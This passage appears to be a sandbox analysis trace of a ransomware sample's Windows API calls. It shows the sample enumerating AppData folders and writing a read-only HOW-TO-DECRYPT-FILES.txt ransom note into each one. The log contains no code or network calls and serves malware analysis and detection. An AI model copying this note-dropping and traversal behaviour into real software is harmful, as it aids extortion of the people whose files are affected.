GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x50 [0049.155] GetLastError () returned 0x12 [0049.155] SetErrorMode (uMode=0x1) returned 0x0 [0049.155] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.155] GetLastError () returned 0x0 [0049.155] GetFileType (hFile=0x184) returned 0x1 [0049.155] SetErrorMode (uMode=0x0) returned 0x1 [0049.155] GetFileType (hFile=0x184) returned 0x1 [0049.155] WriteFile (in: hFile=0x184, lpBuffer=0x1bd828c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18eb7c, lpOverlapped=0x0 | out: lpBuffer=0x1bd828c*, lpNumberOfBytesWritten=0x18eb7c*=0x18da, lpOverlapped=0x0) returned 1 [0049.156] GetLastError () returned 0x0 [0049.156] CloseHandle (hObject=0x184) returned 1 [0049.156] GetLastError () returned 0x0 [0049.156] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e744, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x50 [0049.156] GetLastError () returned 0x0 [0049.156] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.157] GetLastError () returned 0x0 [0049.157] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color", lpFilePart=0x0) returned 0x2a [0049.157] GetLastError () returned 0x0 [0049.157] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.157] GetLastError () returned 0x0 [0049.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.157] GetLastError () returned 0x0 [0049.157] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color", lpFilePart=0x0) returned 0x2a [0049.157] GetLastError () returned 0x0 [0049.157] SetErrorMode (uMode=0x1) returned 0x0 [0049.157] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.157] GetLastError () returned 0x0 [0049.157] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.157] GetLastError () returned 0x0 [0049.157] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.157] GetLastError () returned 0x0 [0049.157] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.157] GetLastError () returned 0x0 [0049.157] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.157] GetLastError () returned 0x12 [0049.158] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.158] SetErrorMode (uMode=0x0) returned 0x1 [0049.158] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color", lpFilePart=0x0) returned 0x2a [0049.158] GetLastError () returned 0x12 [0049.158] SetErrorMode (uMode=0x1) returned 0x0 [0049.158] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.158] GetLastError () returned 0x12 [0049.158] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.158] GetLastError () returned 0x12 [0049.158] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.158] GetLastError () returned 0x12 [0049.158] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.158] GetLastError () returned 0x12 [0049.158] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.158] GetLastError () returned 0x12 [0049.158] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.159] SetErrorMode (uMode=0x0) returned 0x1 [0049.159] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\ACECache11.lst", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\ACECache11.lst", lpFilePart=0x0) returned 0x39 [0049.159] GetLastError () returned 0x12 [0049.159] SetErrorMode (uMode=0x1) returned 0x0 [0049.159] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\eebsym5\\appdata\\local\\adobe\\color\\acecache11.lst"), fInfoLevelId=0x0, lpFileInformation=0x1bdb624 | out: lpFileInformation=0x1bdb624*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd685b1d0, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xd685b1d0, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0xd6965b70, ftLastWriteTime.dwHighDateTime=0x1d2da18, nFileSizeHigh=0x0, nFileSizeLow=0x482)) returned 1 [0049.159] GetLastError () returned 0x12 [0049.159] SetErrorMode (uMode=0x0) returned 0x1 [0049.160] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x43 [0049.160] GetLastError () returned 0x12 [0049.160] SetErrorMode (uMode=0x1) returned 0x0 [0049.160] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\adobe\\color\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.160] GetLastError () returned 0x0 [0049.160] GetFileType (hFile=0x184) returned 0x1 [0049.160] SetErrorMode (uMode=0x0) returned 0x1 [0049.160] GetFileType (hFile=0x184) returned 0x1 [0049.160] WriteFile (in: hFile=0x184, lpBuffer=0x1bf712c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ec54, lpOverlapped=0x0 | out: lpBuffer=0x1bf712c*, lpNumberOfBytesWritten=0x18ec54*=0x18da, lpOverlapped=0x0) returned 1 [0049.161] GetLastError () returned 0x0 [0049.161] CloseHandle (hObject=0x184) returned 1 [0049.161] GetLastError () returned 0x0 [0049.161] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e81c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x43 [0049.161] GetLastError () returned 0x0 [0049.161] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.161] GetLastError () returned 0x0 [0049.161] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles", nBufferLength=0x105, lpBuffer=0x18e850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles", lpFilePart=0x0) returned 0x33 [0049.161] GetLastError () returned 0x0 [0049.161] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.161] GetLastError () returned 0x0 [0049.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.161] GetLastError () returned 0x0 [0049.161] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles", lpFilePart=0x0) returned 0x33 [0049.161] GetLastError () returned 0x0 [0049.162] SetErrorMode (uMode=0x1) returned 0x0 [0049.162] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.170] GetLastError () returned 0x0 [0049.170] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.171] GetLastError () returned 0x0 [0049.171] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.171] GetLastError () returned 0x0 [0049.171] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.171] GetLastError () returned 0x0 [0049.171] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.171] GetLastError () returned 0x12 [0049.171] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.171] SetErrorMode (uMode=0x0) returned 0x1 [0049.171] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles", lpFilePart=0x0) returned 0x33 [0049.171] GetLastError () returned 0x12 [0049.171] SetErrorMode (uMode=0x1) returned 0x0 [0049.171] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.171] GetLastError () returned 0x12 [0049.171] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.171] GetLastError () returned 0x12 [0049.171] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.171] GetLastError () returned 0x12 [0049.172] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.172] GetLastError () returned 0x12 [0049.172] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.172] GetLastError () returned 0x12 [0049.172] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.172] SetErrorMode (uMode=0x0) returned 0x1 [0049.172] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc", nBufferLength=0x105, lpBuffer=0x18e7dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc", lpFilePart=0x0) returned 0x3e [0049.172] GetLastError () returned 0x12 [0049.172] SetErrorMode (uMode=0x1) returned 0x0 [0049.172] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc" (normalized: "c:\\users\\eebsym5\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc"), fInfoLevelId=0x0, lpFileInformation=0x1bfa384 | out: lpFileInformation=0x1bfa384*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd6835070, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xd693fa10, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0xd693fa10, ftLastWriteTime.dwHighDateTime=0x1d2da18, nFileSizeHigh=0x0, nFileSizeLow=0x102a0)) returned 1 [0049.172] GetLastError () returned 0x12 [0049.172] SetErrorMode (uMode=0x0) returned 0x1 [0049.173] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e688, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x4c [0049.173] GetLastError () returned 0x12 [0049.173] SetErrorMode (uMode=0x1) returned 0x0 [0049.173] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\adobe\\color\\profiles\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.173] GetLastError () returned 0x0 [0049.174] GetFileType (hFile=0x184) returned 0x1 [0049.174] SetErrorMode (uMode=0x0) returned 0x1 [0049.174] GetFileType (hFile=0x184) returned 0x1 [0049.174] WriteFile (in: hFile=0x184, lpBuffer=0x1c15e9c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ebe8, lpOverlapped=0x0 | out: lpBuffer=0x1c15e9c*, lpNumberOfBytesWritten=0x18ebe8*=0x18da, lpOverlapped=0x0) returned 1 [0049.175] GetLastError () returned 0x0 [0049.175] CloseHandle (hObject=0x184) returned 1 [0049.175] GetLastError () returned 0x0 [0049.175] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x4c [0049.175] GetLastError () returned 0x0 [0049.175] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.175] GetLastError () returned 0x0 [0049.175] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc", nBufferLength=0x105, lpBuffer=0x18e7dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc", lpFilePart=0x0) returned 0x3d [0049.175] GetLastError () returned 0x0 [0049.175] SetErrorMode (uMode=0x1) returned 0x0 [0049.175] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc" (normalized: "c:\\users\\eebsym5\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc"), fInfoLevelId=0x0, lpFileInformation=0x1c17b80 | out: lpFileInformation=0x1c17b80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd685b1d0, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xd693fa10, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0xd693fa10, ftLastWriteTime.dwHighDateTime=0x1d2da18, nFileSizeHigh=0x0, nFileSizeLow=0xa74)) returned 1 [0049.175] GetLastError () returned 0x0 [0049.175] SetErrorMode (uMode=0x0) returned 0x1 [0049.176] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e688, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x4c [0049.176] GetLastError () returned 0x0 [0049.176] SetErrorMode (uMode=0x1) returned 0x0 [0049.176] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Color\\Profiles\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\adobe\\color\\profiles\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0049.176] GetLastError () returned 0x5 [0049.177] SetErrorMode (uMode=0x0) returned 0x1 [0049.178] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Application Data", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Application Data", lpFilePart=0x0) returned 0x2f [0049.178] GetLastError () returned 0x5 [0049.178] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.178] GetLastError () returned 0x5 [0049.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.178] GetLastError () returned 0x5 [0049.178] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Application Data", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Application Data", lpFilePart=0x0) returned 0x2f [0049.178] GetLastError () returned 0x5 [0049.178] SetErrorMode (uMode=0x1) returned 0x0 [0049.178] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Application Data\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0049.178] GetLastError () returned 0x5 [0049.179] SetErrorMode (uMode=0x0) returned 0x1 [0049.179] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Google", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Google", lpFilePart=0x0) returned 0x25 [0049.179] GetLastError () returned 0x5 [0049.180] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.180] GetLastError () returned 0x5 [0049.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.180] GetLastError () returned 0x5 [0049.180] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Google", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Google", lpFilePart=0x0) returned 0x25 [0049.180] GetLastError () returned 0x5 [0049.180] SetErrorMode (uMode=0x1) returned 0x0 [0049.180] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Google\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.180] GetLastError () returned 0x5 [0049.180] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.180] GetLastError () returned 0x5 [0049.180] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.180] GetLastError () returned 0x5 [0049.180] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.180] GetLastError () returned 0x5 [0049.180] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.181] GetLastError () returned 0x12 [0049.181] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.181] SetErrorMode (uMode=0x0) returned 0x1 [0049.181] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Google", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Google", lpFilePart=0x0) returned 0x25 [0049.181] GetLastError () returned 0x12 [0049.181] SetErrorMode (uMode=0x1) returned 0x0 [0049.181] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Google\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.181] GetLastError () returned 0x12 [0049.181] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.181] GetLastError () returned 0x12 [0049.181] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.181] GetLastError () returned 0x12 [0049.181] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.181] GetLastError () returned 0x12 [0049.181] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.181] GetLastError () returned 0x12 [0049.181] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.181] SetErrorMode (uMode=0x0) returned 0x1 [0049.181] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Google\\Chrome", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Google\\Chrome", lpFilePart=0x0) returned 0x2c [0049.181] GetLastError () returned 0x12 [0049.183] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Google\\CrashReports", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Google\\CrashReports", lpFilePart=0x0) returned 0x32 [0049.183] GetLastError () returned 0x12 [0049.183] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.183] GetLastError () returned 0x12 [0049.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.183] GetLastError () returned 0x12 [0049.183] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Google\\CrashReports", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Google\\CrashReports", lpFilePart=0x0) returned 0x32 [0049.183] GetLastError () returned 0x12 [0049.183] SetErrorMode (uMode=0x1) returned 0x0 [0049.183] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Google\\CrashReports\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.183] GetLastError () returned 0x12 [0049.183] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.183] GetLastError () returned 0x12 [0049.183] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.183] GetLastError () returned 0x12 [0049.183] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.183] SetErrorMode (uMode=0x0) returned 0x1 [0049.184] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Google\\CrashReports", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Google\\CrashReports", lpFilePart=0x0) returned 0x32 [0049.184] GetLastError () returned 0x12 [0049.184] SetErrorMode (uMode=0x1) returned 0x0 [0049.184] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Google\\CrashReports\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.184] GetLastError () returned 0x12 [0049.184] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.184] GetLastError () returned 0x12 [0049.184] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.184] GetLastError () returned 0x12 [0049.184] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.184] SetErrorMode (uMode=0x0) returned 0x1 [0049.184] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\History", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\History", lpFilePart=0x0) returned 0x26 [0049.184] GetLastError () returned 0x12 [0049.184] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.184] GetLastError () returned 0x12 [0049.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.184] GetLastError () returned 0x12 [0049.184] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\History", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\History", lpFilePart=0x0) returned 0x26 [0049.184] GetLastError () returned 0x12 [0049.184] SetErrorMode (uMode=0x1) returned 0x0 [0049.184] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\History\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0049.184] GetLastError () returned 0x5 [0049.186] SetErrorMode (uMode=0x0) returned 0x1 [0049.186] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft", lpFilePart=0x0) returned 0x28 [0049.186] GetLastError () returned 0x5 [0049.187] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft Help", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft Help", 